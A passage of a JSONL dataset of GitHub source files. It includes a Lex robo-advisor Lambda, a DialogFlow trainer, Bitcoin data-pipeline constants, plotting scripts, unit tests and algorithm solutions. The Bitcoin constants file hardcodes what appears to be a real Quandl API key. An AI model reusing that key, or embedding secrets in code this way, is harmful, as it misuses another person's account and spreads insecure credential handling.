64.'},\n )\n if first_name and age and not investment_amount:\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'investmentAmount',\n {'contentType':'PlainText','content':'How much do you want to invest?'},\n )\n if (first_name and age) and (parse_int(investment_amount) < 5000):\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'investmentAmount',\n {'contentType':'PlainText','content':'The minimum investment amount is $5,000 USD; please provide a greater amount to use our service.'},\n )\n return delegate(output_session_attributes, get_slots(intent_request))\n \n if risk_level:\n if risk_level == 'None':\n initial_recommendation = \"100% bonds (AGG), 0% equities (SPY)\"\n elif risk_level == 'Very Low':\n initial_recommendation = \"80% bonds (AGG), 20% equities (SPY)\"\n elif risk_level == 'Low':\n initial_recommendation = \"60% bonds (AGG), 40% equities (SPY)\"\n elif risk_level == 'Medium':\n initial_recommendation = \"40% bonds (AGG), 60% equities (SPY)\"\n elif risk_level == 'High':\n initial_recommendation = \"20% bonds (AGG), 80% equities (SPY)\"\n elif risk_level == 'Very High':\n initial_recommendation = \"0% bonds (AGG), 100% equities (SPY)\"\n\n # Return a message with the initial recommendation based on the risk level:\n return close(\n intent_request[\"sessionAttributes\"],\n \"Fulfilled\",\n {\n \"contentType\": \"PlainText\",\n \"content\": \"\"\"{} thank you for your information.\n Based on the risk level you defined, my recommendation is to choose an investment portfolio with {}\n \"\"\".format(first_name, initial_recommendation),\n },\n )\n\n### Intents Dispatcher ###\n\ndef dispatch(intent_request):\n \"\"\"Called when the user specifies an intent for this bot.\"\"\"\n intent_name = intent_request[\"currentIntent\"][\"name\"]\n if intent_name == \"RecommendPortfolio\":\n return recommend_portfolio(intent_request)\n raise Exception(\"Intent with name \" + intent_name + \" not supported\")\n\n\n### Main Handler ###\n\ndef lambda_handler(event, context):\n \"\"\"\n Route the incoming request based on intent.\n The JSON body of the request is provided in the event slot.\n \"\"\"\n return dispatch(event)","repo_name":"bgregory0913/AWS_Lex_Lambda__RoboAdvisor","sub_path":"RoboAdvisor/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"74737705053","text":"from google_cloud import create_intent\nfrom environs import Env\nimport argparse\nimport json\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(\n description='Скрипт для обучения DialogFlow'\n )\n parser.add_argument(\n '-path',\n help='путь к json файлу с тренировочными фразами',\n type=str,\n nargs='?',\n default='.'\n )\n return parser.parse_args()\n\n\ndef main():\n env = Env()\n env.read_env()\n project_id = env.str('PROJECT_ID')\n args = parse_arguments()\n filepath = args.path\n\n with open(filepath, 'r', encoding='UTF-8') as file:\n file_contents = file.read()\n\n data_intents = json.loads(file_contents)\n for indent_name, training_data in data_intents.items():\n display_name = indent_name\n training_phrases_parts = training_data['questions']\n message_texts = [training_data['answer']]\n create_intent(project_id, display_name, training_phrases_parts, message_texts)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"free-flow-code/dialog_bot","sub_path":"DialogFlow_learning_script.py","file_name":"DialogFlow_learning_script.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22479959480","text":"import PackthingParser as pp\nimport PackthingConfiguration as cfg\n\nimport PackthingImporter as importer\nimport keyengine as kk\n\nimport platforms\nimport packagers \n\nfrom utils import log\n\ndef add_config(names, group=None):\n for n in names:\n cfg.setting(n, pp.find(n, group).value)\n\n\n# collect main info\n\nd = pp.load('packthing.yml')\npp.parse(d, \"main\")\n\nadd_config([\"name\", \"package\", \"org\", \"url\",\n \"maintainer\", \"email\", \"copyright\",\"license\",\n \"tagline\", \"description\"], \"main\")\n\n# collect platforms\n\nplatform = importer.module(cfg.value(\"platform\"), platforms)\n\nadd_config(kk.keys(cfg.value(\"platform\")), cfg.value(\"platform\"))\nplatform.setup()\npp.parse(platform.tree(), \"_platform_\")\n\n# collect controllers\n\ndef version():\n cfg.setting(\"version\", \"0.0.0\")\n try:\n cfg.setting(\"version\", pp.find(\"version\", \"main\").value)\n except AttributeError:\n pass\n cfg.override(\"version\", \"anothervalue\")\n\nversion()\n\n# collect builders\n\nprint(pp.findallvalues(\"builder\", \"repo\"))\n\n# collect packagers\n\ndef installer_name(package, version, arch, ext=None):\n s = package + \"-\" + version + \"-\" + arch\n if ext:\n s += \".\" + ext\n return s\n\npackager = importer.module(cfg.value(\"packager\"), packagers)\n#packager.setup()\n\npp.parse(packager.tree(), \"_packager_\")\npp.parse(packager.tree(), \"_packager_\")\n\ncfg.setting(\"installer\", \n installer_name(cfg.value(\"package\"),\n cfg.value(\"version\"),\n cfg.value(\"arch\"),\n pp.find(\"ext\", \"_packager_\").value))\n\n\ncfg.printConfiguration()\n","repo_name":"bweir/packthing2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"74894115293","text":"from os import path\nimport calendar\nimport time\n\nQUANDL_API_KEY = '6Vypbvq4CTqLv-USiz-y'\nSTART_TIMESTAMP = 1279324800\nSTART_DATE = '2010-07-18'\nEND_TIMESTAMP = 1519603200\nREGRESSION_X_STEP = 30 # days\nREGRESSION_TIMESPAN = 361670400 \nCURRENT_TIME = int(calendar.timegm(time.gmtime()))\n\nDATA_PATH = path.abspath(path.join(path.dirname(__file__), '..', 'data'))\nDATA_MIN_PATH = path.abspath(path.join(path.dirname(__file__), '..', 'data-min'))\n\nSTATIC_PATH = path.join(DATA_PATH, 'static')\nREGRESSIONS_PATH = path.join(DATA_PATH, 'regressions')\nREGRESSIONS_MIN_PATH = path.abspath(path.join(DATA_MIN_PATH, 'regressions'))\nNORMALIZED_PATH = path.join(DATA_PATH, 'normalized')\nNORMALIZED_MIN_PATH = path.join(DATA_MIN_PATH, 'normalized')\n\n# static data\nHALVINGS = path.join(STATIC_PATH, 'halvings.json')\nBLKHDRS_RAW = path.join(STATIC_PATH, 'blkhdrs')\nBLKHDRS = path.join(STATIC_PATH, 'blockchain_headers.csv')\n\n# raw data\nADDRESSES = path.join(DATA_PATH, 'addresses.json')\nMARKETCAP = path.join(DATA_PATH, 'marketcap.json')\nPRICE = path.join(DATA_PATH, 'price.json')\nREALIZEDCAP = path.join(DATA_PATH, 'realizedcap.json')\nSUPPLY = path.join(DATA_PATH, 'supply.json')\nTRANSACTIONS = path.join(DATA_PATH, 'transactions.json')\nMONTHLY_SUPPLY = path.join(DATA_PATH, 'monthly_supply.json')\nINTEREST = path.join(DATA_PATH, 'interest.json')\nFEAR_GREED = path.join(DATA_PATH, 'fear_greed.json')\nVOLUME = path.join(DATA_PATH, 'volume.json')\nCOT = path.join(DATA_PATH, 'cot.json')\nDEALER_RATIO = path.join(DATA_PATH, 'dealer_ratio.json')\nASSETMNGR_RATIO = path.join(DATA_PATH, 'assetmngr_ratio.json')\nFUNDS_RATIO = path.join(DATA_PATH, 'funds_ratio.json')\n\n# regression data\nTRANSACTIONS_POWER_SQUARED = path.join(REGRESSIONS_PATH, 'transactions_power_squared.json')\nADDRESSES_POWER_GENMETCALFE = path.join(REGRESSIONS_PATH, 'addresses_power_genmetcalfe.json')\nTROLOLOLO_LOG = path.join(REGRESSIONS_PATH, 'trolololo_log.json')\nPOWER_LAW = path.join(REGRESSIONS_PATH, 'power_law.json')\n\n# normalized data\nTRANSACTIONS_SQUARED = path.join(NORMALIZED_PATH, 'transactions_squared.json')\nMETCALFE_PRICE = path.join(NORMALIZED_PATH, 'metcalfe_price.json')\nADDRESSES_GENMETCALFE = path.join(NORMALIZED_PATH, 'addresses_genmetcalfe.json')\nSTOCK_TO_FLOW = path.join(NORMALIZED_PATH, 'stock_flow.json')\nINTEREST_SCALED = path.join(NORMALIZED_PATH, 'interest_scaled.json')\nDAILY_LOG_RETURNS = path.join(NORMALIZED_PATH, 'daily_log_returns.json')\nMETCALFE_MULTIPLE = path.join(NORMALIZED_PATH, 'metcalfe_multiple.json')\n\n# API URLs\nBLOCKCHAIN_URL = 'https://api.blockchain.info/charts/'\nCOINMETRICS_URL = 'https://community-api.coinmetrics.io/v2/assets/btc/'\n\nDATA_INFO = [\n {\n 'path': ADDRESSES,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=AdrActCnt&start=%s' % START_DATE\n },\n {\n 'path': MARKETCAP,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=CapMrktCurUSD&start=%s' % START_DATE\n },\n {\n 'path': PRICE,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=PriceUSD&start=%s' % START_DATE\n },\n {\n 'path': REALIZEDCAP,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=CapRealUSD&start=%s' % START_DATE\n },\n {\n 'path': SUPPLY,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=SplyCur&start=%s' % START_DATE\n },\n { \n 'path': TRANSACTIONS,\n 'url': BLOCKCHAIN_URL,\n 'endpoint': 'n-transactions-excluding-popular?timespan=all&start=%s&format=json&sampled=false' % START_TIMESTAMP\n },\n {\n 'path': VOLUME,\n 'url': BLOCKCHAIN_URL,\n 'endpoint': 'trade-volume?timespan=all&start=%s&format=json&sampled=false' % START_TIMESTAMP\n },\n {\n 'path': FEAR_GREED,\n 'url': 'https://api.alternative.me/',\n 'endpoint': 'fng/?limit=0'\n },\n {\n 'path': COT,\n 'url': 'https://www.quandl.com/api/v3/datasets/',\n 'endpoint': 'CFTC/133741_F_ALL.json?api_key=%s' % QUANDL_API_KEY\n }\n]\n","repo_name":"christosci/BitcoinTrajectory","sub_path":"cron/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28997294170","text":"N, M = map(int, input().split()) # 한 줄에 입력받기\ninclude = []\n\ndef perm(k):\n if len(include) == M:\n for i in range(M):\n print(include[i], end=' ')\n print(\"\") #\\n 쓰지 않아도 됨\n return\n for i in range(k, N+1):\n if i not in include:\n include.append(i)\n perm(i+1) # k+1 아님~! k랑 i 구분하기!!\n include.pop()\n \nperm(1)","repo_name":"yunjikwak/algorithm","sub_path":"BOJ/prob15650.py","file_name":"prob15650.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18343132127","text":"import unittest\nfrom openlostcat.operators.filter_operators import FilterConst, FilterREF\nfrom openlostcat.operators.bool_operators import BoolConst, BoolREF\nfrom openlostcat.parsers.refdict import RefDict\n\n\nclass TestRefDict(unittest.TestCase):\n\n def test_is_ref(self):\n \"\"\"Test is_ref function\n \"\"\"\n self.assertTrue(RefDict.is_ref(\"#filter_ref\"))\n self.assertTrue(RefDict.is_ref(\"##bool_ref\"))\n self.assertFalse(RefDict.is_ref(\"not_a_valid_ref\"))\n\n def test_is_bool_ref(self):\n \"\"\"Test is_bool_ref function\n \"\"\"\n self.assertFalse(RefDict.is_bool_ref(\"#filter_ref\"))\n self.assertTrue(RefDict.is_bool_ref(\"##bool_ref\"))\n self.assertFalse(RefDict.is_bool_ref(\"not_a_valid_ref\"))\n\n def test_create_ref(self):\n \"\"\"Test create_ref function\n \"\"\"\n with self.assertRaises(SyntaxError):\n RefDict.create_ref(\"not_a_valid_ref\", FilterConst(False))\n with self.assertRaises(SyntaxError):\n RefDict.create_ref(\"#filter_ref\", BoolConst(False))\n self.assertTrue(isinstance(RefDict.create_ref(\"#filter_ref\", FilterConst(True)), FilterREF))\n self.assertTrue(isinstance(RefDict.create_ref(\"##bool_ref\", BoolConst(True)), BoolREF))\n self.assertTrue(isinstance(RefDict.create_ref(\"##bool_ref\", FilterConst(True)), BoolREF))\n\n def test_getter_setter_filter(self):\n \"\"\"Test get and set function\n \"\"\"\n filter_ref = RefDict.create_ref(\"#filter_ref\", FilterConst(True))\n ref_dict = RefDict()\n ref_dict.set_ref(filter_ref)\n self.assertEqual(len(ref_dict.filter_ref_dict), 1)\n self.assertEqual(ref_dict.get_ref(\"#filter_ref\"), filter_ref)\n\n def test_getter_setter_bool(self):\n \"\"\"Test get and set function\n \"\"\"\n bool_ref = RefDict.create_ref(\"##bool_ref\", BoolConst(True))\n ref_dict = RefDict()\n ref_dict.set_ref(bool_ref)\n self.assertEqual(len(ref_dict.bool_ref_dict), 1)\n self.assertEqual(ref_dict.get_ref(\"##bool_ref\"), bool_ref)\n\n def test_setter_duplicate_ref_name(self):\n \"\"\"Test if error was raised by set duplicate ref\n \"\"\"\n bool_ref = RefDict.create_ref(\"##bool_ref\", BoolConst(True))\n bool_ref2 = RefDict.create_ref(\"##bool_ref\", BoolConst(False))\n ref_dict = RefDict()\n ref_dict.set_ref(bool_ref)\n with self.assertRaises(SyntaxError):\n ref_dict.set_ref(bool_ref2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lukacsg/openlostcat","sub_path":"tests/parsers/test_refdict.py","file_name":"test_refdict.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71710604575","text":"import math, ResMgr\nfrom items import _xml\nfrom items.components import sound_components\nfrom items.writers import shared_writers\n\ndef writeWWTripleSoundConfig(soundConfig, section):\n _xml.rewriteString(section, 'wwsound', soundConfig.wwsound, defaultValue='')\n _xml.rewriteString(section, 'wwsoundPC', soundConfig.wwsoundPC, defaultValue='')\n _xml.rewriteString(section, 'wwsoundNPC', soundConfig.wwsoundNPC, defaultValue='')\n\n\ndef writeHullAimingSound(hullAimingSound, section, cache):\n if hullAimingSound is None:\n return _xml.deleteAndCleanup(section, 'hullAiming/audio')\n else:\n changed = False\n audioKey = 'hullAiming/audio/'\n changed |= shared_writers.writeLodDist(hullAimingSound.lodDist, section, audioKey + 'lodDist', cache)\n changed |= _xml.rewriteFloat(section, audioKey + 'angleLimitValue', math.degrees(hullAimingSound.angleLimitValue))\n soundsKey = audioKey + 'sounds/'\n soundsDS = _xml.ListRewriter(section, soundsKey + '*')\n for sound in hullAimingSound.sounds:\n soundDS = soundsDS.next(preferredPredicate=lambda ds, snd=sound: ds.name == snd.state, path=soundsKey + sound.state)\n changed |= _xml.rewriteString(soundDS, 'underLimitSounds/wwsoundPC', sound.underLimitSounds.PC)\n changed |= _xml.rewriteString(soundDS, 'underLimitSounds/wwsoundNPC', sound.underLimitSounds.NPC)\n changed |= _xml.rewriteString(soundDS, 'overLimitSounds/wwsoundPC', sound.overLimitSounds.PC)\n changed |= _xml.rewriteString(soundDS, 'overLimitSounds/wwsoundNPC', sound.overLimitSounds.NPC)\n\n changed |= soundsDS.flush()\n return changed","repo_name":"IzeBerg/wot-src","sub_path":"sources/res/scripts/common/items/writers/sound_writers.py","file_name":"sound_writers.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"33"} +{"seq_id":"11830327576","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# define colorscale\ncmap = {\"orange\" : \"#E69F00\", \"light_blue\" : \"#56B4E9\",\n \"green\" : \"#009E73\", \"yellow\" : \"#F0E442\",\n \"blue\" : \"#0072B2\", \"red\" : \"#D55E00\",\n \"pink\" : \"#CC79A7\", \"black\" : \"#000000\"}\n\n##############\n## settings ##\n##############\n\nparameter_name = 'nu'\nparameter_name_fancy = 'Memory\\nhalf- life'\nparameter_unit = 'd.'\nIC_ratio = 0.162\npopulation = [11.6e6, 10.4e6]\nIC_beds_nominal = [1000, 600]\nIC_beds_extended = [2000, 1000]\nlocation_IC_annotation = 175\nIC_multipliers = [IC_beds_nominal[1]/IC_beds_nominal[i] for i in range(len(IC_beds_nominal))]\nstates = ['Ih', 'x', 'l']\ncountries = ['BE', 'SWE']\ncountry_names = ['Belgium', 'Sweden']\ncolors = [cmap['blue'], cmap['green'], cmap['red'], cmap['black']]\nylabels = ['IC load (beds)', 'Gross\\nagg. output (%)', 'Labor\\ncompensation (%)']\nylimits = [[[0, 7.75],[0,8.5]], [90, 101], [90, 101]]\n\n###############\n## internals ##\n###############\n\n# define all paths absolute\nabs_dir = os.path.dirname(__file__)\n\n# load simulations\nsimout = pd.read_csv(os.path.join(abs_dir, f'simulations-variate_parameters-{parameter_name}.csv'), header=0, index_col=[0, 1, 2], parse_dates=True)\ndates = simout.index.get_level_values('date').unique().values\nparameter_values = simout.index.get_level_values(parameter_name).unique().values\n\n########################\n## visualise only epi ##\n########################\n\nfig, ax = plt.subplots(nrows=1, ncols=len(countries), figsize=(8.3, 11.7/3.3), sharex=True)\n\nylimit=[[0, 6.3],[0,7]]\n\nfor j, (country,IC_multiplier) in enumerate(zip(countries, IC_multipliers)):\n for val,color in zip(parameter_values,colors):\n ## Simulations\n ax[j].plot(range(len(dates)), simout.loc[(country, val, slice(None)), 'Ih']*IC_ratio*IC_multiplier,\n color=color, linewidth=2)\n\n ## HCS capacity\n # lines\n ax[j].axhline(IC_beds_nominal[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n linestyle='--', color='black', linewidth=1)\n #ax[j].axhline(IC_beds_extended[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n # linestyle='--', color='black', linewidth=1)\n # text\n ax[j].text(x=location_IC_annotation, y=(IC_beds_nominal[j])/population[j] *\n 100000*IC_multiplier+0.20, s=f'nominal IC capacity', size=10)\n #ax[j].text(x=location_IC_annotation, y=(IC_beds_extended[j])/population[j] *\n # 100000*IC_multiplier+0.20, s=f'extended IC capacity', size=10) \n ## hide spines\n ax[j].spines[['right', 'top']].set_visible(False)\n ## y-axis\n # ylimits\n ax[j].set_ylim(ylimit[j])\n # ylabels\n if j==0:\n ax[j].set_ylabel(ylabels[0], size=14)\n # no yticks for IC load\n ax[j].set_yticks([])\n # align y labels\n posx=-0.025\n ax[j].yaxis.set_label_coords(posx, 0.5)\n ## x-axis\n # xticksize\n ax[j].tick_params(axis='both', which='major', labelsize=14)\n # xlabels\n ax[j].set_xlabel('time (days)', size=14)\n # legend\n #if j == len(countries)-1:\n # ax[j].legend(parameter_values, title=f'{parameter_name_fancy} ({parameter_unit})', framealpha=1, loc=4)\n # title\n ax[j].set_title(country_names[j], size=14)\n\nplt.tight_layout()\nplt.savefig(f'simulations-variate_parameters-{parameter_name}-epi_only.pdf')\n#plt.show()\nplt.close()\n\n#########################\n## visualise scenarios ##\n#########################\n\n# make figure\nfig, ax = plt.subplots(nrows=len(states), ncols=len(countries), figsize=(11.7, 8.3), sharex=True)\n\nfor i,(state,ylimit,ylabel) in enumerate(zip(states,ylimits,ylabels)):\n for j, (country,IC_multiplier) in enumerate(zip(countries, IC_multipliers)):\n for val,color in zip(parameter_values,colors):\n # visualise scenarios\n if state == 'Ih':\n ax[i,j].plot(range(len(dates)), simout.loc[(country, val, slice(None)), state]*IC_ratio*IC_multiplier, linewidth=2, color=color)\n else:\n ax[i,j].plot(range(len(dates)), simout.loc[(country, val, slice(None)), state], color=color, linewidth=2)\n \n ## HCS capacity\n if i==0:\n # lines\n ax[0, j].axhline(IC_beds_nominal[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n linestyle='--', color='black', linewidth=1)\n #ax[0, j].axhline(IC_beds_extended[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n # linestyle='--', color='black', linewidth=1)\n # text\n ax[0, j].text(x=location_IC_annotation, y=(IC_beds_nominal[j])/population[j] *\n 100000*IC_multiplier+0.20, s=f'nominal IC capacity', size=10)\n #ax[0, j].text(x=location_IC_annotation, y=(IC_beds_extended[j])/population[j] *\n # 100000*IC_multiplier+0.20, s=f'extended IC capacity', size=10) \n ## hide spines\n ax[i,j].spines[['right', 'top']].set_visible(False)\n ## y-axis\n # ylimits\n if i == 0:\n ax[i,j].set_ylim(ylimit[j])\n else:\n ax[i,j].set_ylim(ylimit)\n # ylabels\n if j==0:\n ax[i,j].set_ylabel(ylabel, size=14)\n # no yticks for IC load\n if i==0:\n ax[i,j].set_yticks([])\n # align y labels\n posx=-0.075\n ax[0, j].yaxis.set_label_coords(posx, 0.5)\n ## x-axis\n # xlabels\n if i == len(states)-1:\n ax[i, j].set_xlabel('time (days)', size=14)\n # legend\n if ((i == len(states)-1) & (j == len(countries)-1)):\n ax[i, j].legend(parameter_values, title=f'{parameter_name_fancy} ({parameter_unit})', framealpha=1)\n # title\n if i==0:\n ax[i, j].set_title(country_names[j])\n\nplt.tight_layout()\nplt.savefig(f'simulations-variate_parameters-{parameter_name}.pdf')\nplt.show()\nplt.close()\n","repo_name":"twallema/pyIEEM","sub_path":"notebooks/visualise-variation_parameter.py","file_name":"visualise-variation_parameter.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30035502610","text":"# Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).\n\n# For example,\n# S = \"ADOBECODEBANC\"\n# T = \"ABC\"\n# Minimum window is \"BANC\".\n\n# Note:\n# If there is no such window in S that covers all characters in T, return the empty string \"\".\n\n# If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S.\n\n# idea: use 2 dict to count\n# brute force:\nclass Solution(object):\n def minWindow(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n\n def isSubset(cntT, cntS):\n for char in cntT:\n if char not in cntS or cntS[char] < cntT[char]:\n return False\n return True\n\n cntT = {}\n for char in t:\n if char not in cntT:\n cntT[char] = 0\n cntT[char] += 1\n\n l, res, minLen = 0, '', len(s) + 1\n cntS = {}\n for idx, char in enumerate(s):\n if char in cntT:\n if char not in cntS:\n cntS[char] = 0\n cntS[char] += 1\n if isSubset(cntT, cntS):\n while isSubset(cntT, cntS):\n if idx - l + 1 < minLen:\n minLen = idx - l + 1\n res = s[l: idx + 1]\n if s[l] in cntS:\n cntS[s[l]] -= 1\n if cntS[s[l]] == 0:\n del cntS[s[l]]\n l += 1\n return res\n\n# better implementation\nclass Solution(object):\n def minWindow(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n cnt_t = collections.defaultdict(lambda: 0)\n for char in t:\n cnt_t[char] += 1\n res_len = float('inf')\n res = ''\n left = 0\n cnt = len(t)\n\n for index, char in enumerate(s):\n if char in cnt_t:\n if cnt_t[char] > 0:\n cnt -= 1\n cnt_t[char] -= 1\n while cnt == 0:\n # compute the answer and make it invalid\n if index - left + 1 < res_len:\n res_len = index - left + 1\n res = s[left: index + 1]\n if s[left] in cnt_t:\n if cnt_t[s[left]] == 0:\n cnt += 1\n cnt_t[s[left]] += 1\n left += 1\n return res\n","repo_name":"Jason101616/LeetCode_Solution","sub_path":"Hash Table/76. Minimum Window Substring.py","file_name":"76. Minimum Window Substring.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"23983414359","text":"from chinaArea.MyClass import Area\nfrom utils.ExcelUtils import ExcelUtils\n\narea = Area()\nallArea = []\n\narea.parentCode = \"CHN\"\narea.parentName = \"中国\"\narea.type = \"省\"\nallArea.append(area)\nExcelUtils().writeExcel(\"d:\\\\xx.xls\", allArea)\n","repo_name":"cuiynan/python","sub_path":"chinaArea/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8864339209","text":"#!/usr/bin/env python3\n#\n# This file is part of the AVHD-AS / P.NATS Phase 2 Processing Chain\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport logging\nimport lib.test_config as cfg\nimport lib.parse_args as parse_args\nimport lib.log as log\nimport lib.cmd_utils as cmd_utils\nimport lib.ffmpeg as ffmpeg\nimport lib.check_requirements as check_requirements\n\nlogger = log.setup_custom_logger('main')\n\n\ndef run(cli_args):\n test_config = cfg.TestConfig(cli_args.test_config, cli_args.filter_src, cli_args.filter_hrc, cli_args.filter_pvs)\n\n # get all required segments to be encoded\n required_segments = test_config.get_required_segments()\n\n # encode in parallel\n logger.info(\"will generate \" + str(len(required_segments)) + \" segments\")\n\n import lib.downloader as downloader\n dload = downloader.Downloader(\n folder=test_config.get_video_segments_path(),\n bitmovin_key_file=os.path.join(check_requirements.get_processing_chain_dir(), \"bitmovin_settings\", \"keyfile.txt\"),\n input_details=os.path.join(check_requirements.get_processing_chain_dir(), \"bitmovin_settings\", \"input_details.yaml\"),\n output_details=os.path.join(check_requirements.get_processing_chain_dir(), \"bitmovin_settings\", \"output_details.yaml\"),\n overwrite=cli_args.force)\n\n cmd_runner = cmd_utils.ParallelRunner(cli_args.parallelism)\n\n for seg in required_segments:\n if seg.video_coding.is_online:\n if not cli_args.skip_online_services:\n if seg.video_coding.encoder == \"youtube\":\n logger.debug(\"will download youtube-encoding for video \" + seg.get_filename() + \".\")\n if not cli_args.dry_run:\n dload.init_download(seg, cli_args.force, cli_args.verbose)\n elif seg.video_coding.encoder.casefold() == \"bitmovin\":\n logger.debug(\"will encode \" + seg.get_filename() + \" using Bitmovin.\")\n if not cli_args.dry_run:\n dload.encode_bitmovin(seg=seg)\n else:\n logger.debug(\"skipping \" + seg.get_filename() + \"because skipping online services is enabled.\")\n else:\n cmd = ffmpeg.encode_segment(seg, overwrite=cli_args.force)\n cmd_runner.add_cmd(\n cmd,\n name=str(seg)\n )\n\n # only write logfile if command should run\n if cmd:\n logfile = seg.get_logfile_path()\n\n # replace all absolute paths\n seg_cmd = cmd.replace(test_config.get_video_segments_path() + \"/\", \"\")\n seg_cmd = seg_cmd.replace(check_requirements.get_processing_chain_dir() + \"/logs/\", \"\")\n seg_cmd = seg_cmd.replace(test_config.get_src_vid_path() + \"/\", \"\")\n\n logger.debug(\"writing segment logfile to \" + logfile)\n if not cli_args.dry_run:\n with open(logfile, \"w\") as lf:\n lf.write(\"segmentFilename: \" + seg.get_filename() + \"\\n\")\n lf.write(\"processingChain: \" + check_requirements.get_processing_chain_version() + \"\\n\")\n lf.write(\"ffmpegCommand: \" + seg_cmd + \"\\n\")\n\n if cli_args.dry_run:\n cmd_runner.log_commands()\n return test_config\n\n logger.info(\"starting to process segments, please wait\")\n cmd_runner.run_commands()\n\n return test_config\n\n\ndef main():\n cli_args = parse_args.parse_args(os.path.basename(__file__), 1)\n\n # initialize logger\n if cli_args.verbose:\n logger.setLevel(logging.DEBUG)\n\n check_requirements.check_requirements(skip=cli_args.skip_requirements)\n\n run(cli_args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnats2avhd/processing-chain","sub_path":"p01_generateSegments.py","file_name":"p01_generateSegments.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"36043042127","text":"import os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-pastebinapp',\n version='0.0.2',\n packages=['pastebinapp'],\n include_package_data=True,\n license='MIT License',\n description='A simple Django app for posting code snippets',\n long_description='README',\n url='',\n author='Anthony Schubert',\n author_email='schubeal@gmail.com',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Framework :: Django :: 1.9', # replace \"X.Y\" as appropriate\n 'Intended Audience :: Developers, Sys Admins',\n 'License :: OSI Approved :: MIT License', # example license\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n # Replace these appropriately if you are stuck on Python 2.\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)\n","repo_name":"suttung3r/django-pastebinapp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1200209098","text":"import sys\ninput = sys.stdin.readline\n\n############ ---- Input Functions ---- ############\ndef inp():\n return(int(input()))\ndef inlt():\n return(list(map(int,input().split())))\ndef insr():\n s = input()\n return(list(s[:len(s) - 1]))\ndef invr():\n return(map(int,input().split()))\nt = inp()\nwhile t:\n t-=1\n n = inp()\n flag = 1\n numOfOp = 0\n if n % 2 == 0:\n numOfOp = int(n/2)\n flag = 0\n elif n == 1:\n numOfOp = 1\n else:\n numOfOp = int((n+1)/2)\n print(numOfOp)\n istart = 2\n jstart = 6\n if flag:\n print(\"1 2\")\n istart = 5\n jstart = 9\n numOfOp -= 1\n for i in range(0, numOfOp):\n ik = istart + 6*i\n jk = jstart + 6*i\n print(f'{ik} 